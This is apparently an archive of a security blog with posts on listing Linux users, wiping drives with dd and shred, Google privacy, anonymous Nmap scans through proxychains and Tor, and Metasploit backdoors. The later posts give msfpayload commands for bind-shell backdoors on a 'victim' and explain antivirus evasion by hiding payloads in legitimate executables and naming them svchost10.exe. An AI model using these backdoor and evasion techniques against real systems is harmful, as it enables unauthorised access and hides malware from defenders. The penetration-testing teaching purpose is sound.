Posted on 04-05-2012
Filed Under (linux, security, ubuntu) by admin

The /etc/passwd file in Linux contains the list of user accounts and basic information about each of them. We can use this file to list every user that exists on the system. For example, the “cat” command outputs the whole file. Notice that every line starts with the username field and that the fields are separated by colons.

root@bt:~# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
landscape:x:103:108::/var/lib/landscape:/bin/false
messagebus:x:104:112::/var/run/dbus:/bin/false
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
mysql:x:105:113::/var/lib/mysql:/bin/false
avahi:x:106:114::/var/run/avahi-daemon:/bin/false
snort:x:107:115:Snort IDS:/var/log/snort:/bin/false
statd:x:108:65534::/var/lib/nfs:/bin/false
usbmux:x:109:46::/home/usbmux:/bin/false
pulse:x:110:116::/var/run/pulse:/bin/false
rtkit:x:111:117::/proc:/bin/false
festival:x:112:29::/home/festival:/bin/false
postgres:x:1000:1000::/home/postgres:/bin/sh

Now, if we want to filter out all that extra information and print just the usernames, we can use the “awk” command like this:

awk -F ':' '{print $1}' /etc/passwd

In this command the “-F” option tells awk which character separates the fields, in this case the colon “:”, and the {print $1} action prints the first field, which is the username.

root@bt:~# awk -F ':' '{print $1}' /etc/passwd
root
daemon
bin
sys
sync
games
man
lp
mail
news
uucp
proxy
www-data
backup
list
irc
gnats
libuuid
syslog
sshd
landscape
messagebus
nobody
mysql
avahi
snort
statd
usbmux
pulse
rtkit
festival
postgres
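A parser for the same file written in Python, as an added example that is not part of the original post: it reproduces the awk result and then runs the checks a reviewer would make on such a listing (a second UID-0 account, system accounts that still have a login shell, empty password fields). The sample data, the NOLOGIN_SHELLS set and the UID-1000 boundary between system and regular accounts are assumptions made for the example.

```python
from collections import namedtuple

# Constructed sample in /etc/passwd format (abridged, not copied from a real host).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:113::/var/lib/mysql:/bin/false
postgres:x:1000:1000::/home/postgres:/bin/sh
toor:x:0:0:second root:/root:/bin/bash
"""

# Shells that refuse an interactive login (assumed set; extend it for your distribution).
NOLOGIN_SHELLS = {"/bin/sync", "/bin/false", "/usr/sbin/nologin", "/sbin/nologin"}

# Field order of passwd(5); an "x" in the passwd field means the hash lives in /etc/shadow.
PasswdEntry = namedtuple("PasswdEntry", "name passwd uid gid gecos home shell")

def parse_passwd(text):
    """Split every non-empty line on ':' into the seven passwd(5) fields."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        f = line.split(":")
        if len(f) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(f)}")
        entries.append(PasswdEntry(f[0], f[1], int(f[2]), int(f[3]), *f[4:]))
    return entries

def usernames(entries):
    """Same result as awk -F ':' '{print $1}' /etc/passwd."""
    return [e.name for e in entries]

def audit(entries):
    """Flag what a reviewer looks for: extra UID-0 accounts, system accounts
    (UID below 1000, an assumed boundary) with a login shell, and empty password fields."""
    findings = []
    for e in entries:
        if e.uid == 0 and e.name != "root":
            findings.append(f"{e.name}: UID 0 but not root")
        if e.uid < 1000 and e.name != "root" and e.shell not in NOLOGIN_SHELLS:
            findings.append(f"{e.name}: system account with login shell {e.shell}")
        if e.passwd == "":
            findings.append(f"{e.name}: empty password field")
    return findings
```

Run it against the real file with `audit(parse_passwd(open("/etc/passwd").read()))`; on the listing above it would flag most of the service accounts because they still use /bin/sh.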

Posted on 19-03-2012
Filed Under (linux, security) by admin

If you’re planning on selling or decommissioning your old PC or laptop, it is always good practice to completely erase the data on the hard drive. There are tools that make recovering files very easy, even when those files have been overwritten by repartitioning and installing a new OS. Tools like shred or DBAN make securely erasing a hard drive pretty easy and straightforward. For most folks, using “dd” should work.

dd if=/dev/zero of=/dev/hda

The above command overwrites your entire drive with zeros; however, if you’re not satisfied, you could use “shred,” which is used by government agencies like the DoD. When using shred the default is to make 25 passes over the hard drive or files, writing random data, but for our scenario 25 passes seems overkill, so we change the default to something like 5 or 10, and by adding the “-z” option we tell shred to write the last pass with zeros.

shred -vz -n 10 /dev/hda

When booting from a live CD you don’t need the “-f” option, which forces write permission on the target so that it can be overwritten: since you’re already root, you don’t need that option. I thought it would be good to clarify that, since I’ve seen posts in which people use the “-f” option unnecessarily.
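The -n/-z behaviour and the verification step the post skips, as an added example in Python (not shred itself and not the author's code): it overwrites a scratch file with N random passes, finishes with a zero pass, and then reads it back to confirm every byte is zero, which is the same check you would run against the wiped device. The scratch file, pass count and chunk size are constructed for the example.

```python
import os
import tempfile

CHUNK = 1 << 20  # 1 MiB per read/write; an assumed size

def overwrite_file(path, passes=3, final_zero=True):
    """Overwrite a regular file in place: `passes` passes of random bytes, then
    (like shred -z) one pass of zeros so the result does not look scrubbed.
    Constructed illustration of the -n/-z semantics, not GNU shred."""
    size = os.path.getsize(path)
    sources = [os.urandom] * passes + ([lambda n: b"\x00" * n] if final_zero else [])
    with open(path, "r+b") as f:
        for make_bytes in sources:
            f.seek(0)
            remaining = size
            while remaining:
                n = min(CHUNK, remaining)
                f.write(make_bytes(n))
                remaining -= n
            f.flush()
            os.fsync(f.fileno())  # push each pass to the medium before the next
    return passes + (1 if final_zero else 0)

def is_zero_filled(path):
    """Verification the post omits: read the file or device back and confirm
    every byte is 0x00, as expected after dd if=/dev/zero or shred -z."""
    zero = bytes(CHUNK)
    with open(path, "rb") as f:
        while True:
            chunk = f.read(CHUNK)
            if not chunk:
                return True
            if chunk != zero[:len(chunk)]:
                return False

def demo():
    """Create a scratch file with recognisable content, wipe it, verify."""
    fd, path = tempfile.mkstemp()
    with os.fdopen(fd, "wb") as f:
        f.write(b"SECRET " * 100000)  # constructed content, ~700 KB
    before = is_zero_filled(path)
    n = overwrite_file(path, passes=2, final_zero=True)
    after = is_zero_filled(path)
    os.remove(path)
    return before, n, after
```

Verifying a whole device works the same way with the device path. On SSDs and copy-on-write filesystems, overwriting a file in place does not guarantee the old blocks are gone, so for those wipe the whole device or use the drive's own secure-erase command.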

Posted on 25-02-2012
Filed Under (security) by admin

Here’s a quick tutorial on how to remove your Google Chrome web history. I doubt this will prevent Google from logging your online searches and activity, but at least it is a step of precaution.

1. Log in to your Google account, and click “Account Settings.”



Posted on 25-02-2012
Filed Under (security) by admin

If you use the Google search engine, you might have seen the new Google “privacy policy,” which takes effect on March 1st. This privacy policy has generated plenty of controversy, and it has many people worried because of the information-gathering power it gives Google over users’ searches, Android smartphone users, etc. In a nutshell, the new policy will combine user data from services like YouTube, Gmail and Google search and create a single merged profile for each user of its services. As a result, the attorneys general of 36 states sent a letter to Google explaining their concern.

“In the letter, the attorneys general said, “Google’s new privacy policy goes against a respect for privacy that Google has carefully cultivated as a way to attract consumers. It rings hollow to call [the ability of users] to exit the Google products ecosystem a ‘choice’ in an Internet economy where the clear majority of all Internet users use – and frequently rely on – at least one Google product on a regular basis.” The letter makes special mention of the potential problems the new privacy policy will have on Android-powered smartphone users, many of whom will find it “virtually impossible” to escape the policy without ditching their phones.”

Quoted from csoonline.com; full article: “36 State AG Blast Google Privacy Policy Change”.


In order to achieve complete anonymity while scanning a host, proxychains is as good as it gets, because it uses Tor and Privoxy to tunnel the Nmap scan. In other words, you feed an application to proxychains, in this case Nmap, and it routes the application’s connections through Tor. ProxyChains lets you use SSH, Telnet, VNC, FTP and other network applications from behind HTTP(S) and SOCKS(4/5) proxy servers. Be aware that proxychains only tunnels TCP and DNS; in other words, avoid UDP scans and host discovery through ICMP (ping). The options for this are “-n”, telling nmap not to resolve hostnames, and “-PN”, telling nmap not to ping the host. Also, the Tor network is slow, so be patient! I’m doing this in BackTrack; therefore, I will not go over the installation of Nmap, proxychains and Tor, because they are all there. But you may want to check the proxychains.conf file and make sure you have these settings.

[ProxyList]
# add proxy here ...
# meanwhile
# defaults set to "tor"
socks4  127.0.0.1 9050

The “-sTV” options tell nmap to do a full TCP connect scan with version detection, “-PN” tells nmap not to ping the remote host, “-n” not to resolve any DNS records, and finally “-p” specifies the ports.

root@bt:~# proxychains  nmap -sTV -PN -n -p21,22,25,80 64.13.134.52
ProxyChains-3.1 (http://proxychains.sf.net)
 
Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-10-03 20:12 EDT
|S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:25-<--timeout
|S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:22-<><>-OK
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
|S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:21-<--timeout
|S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:80-<><>-OK
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
|S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:22-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:80-<><>-OK
Nmap scan report for 64.13.134.52
Host is up (12s latency).
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
22/tcp open   ssh     OpenSSH 4.3 (protocol 2.0)
25/tcp closed smtp
80/tcp open   http    Apache httpd 2.2.3 ((CentOS))
 
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.64 seconds


There are different ways to drop a backdoor on a target machine with meterpreter. For example, netcat can be uploaded to the victim and, with a few registry hacks, the backdoor runs when the user logs in, allowing shell access; however, there are a few drawbacks to this method. First, it requires editing the registry and creating new keys (a lengthy process). Second, upon user login you can see netcat running for a split second and closing; it doesn’t take a savvy user to know something is up. And third, it is an unauthenticated backdoor, which means it is open to anyone. The two approaches I’m taking here are also unauthenticated, which is not recommended, but sometimes that is the only choice, and, more importantly, they are already built into Metasploit.
The first method is the payload “shell_bind_tcp”, which is the equivalent of netcat but without any registry editing. Pauldotcom has an excellent tutorial about this. For this tutorial I’m assuming we already have a meterpreter session going.

First, we create our backdoor:
msfpayload windows/shell_bind_tcp RHOST=192.168.1.100,LPORT=4444 x > evil.exe
RHOST is the remote box where your backdoor will be running, waiting for connections.

Posted on 24-09-2010
Filed Under (metasploit, pentesting, security) by admin

One of the cool features of Metasploit is the ability to encode your payload into an executable; furthermore, the msfencode “-x” option allows you to select a template, which could be a legitimate executable like putty, calc, notepad, etc., in which to embed your payload, therefore making it more difficult to detect. Now, when trying to bypass antivirus, it is best to use a “stager” rather than a full “payload”. Why? Well, a stager is a small piece of code that allocates memory, opens a network port to communicate with the framework, and then downloads the rest of the payload. A stager is very small, and it is because of its size that antivirus products have a hard time detecting it. A full payload, however, has everything needed to execute. So first we will create an executable using a single payload and put it through AV scans.

msfpayload windows/shell_bind_tcp RHOST=192.168.1.100,LPORT=4444 x > svchost10.exe

Now, let’s put it through AV scans, and….

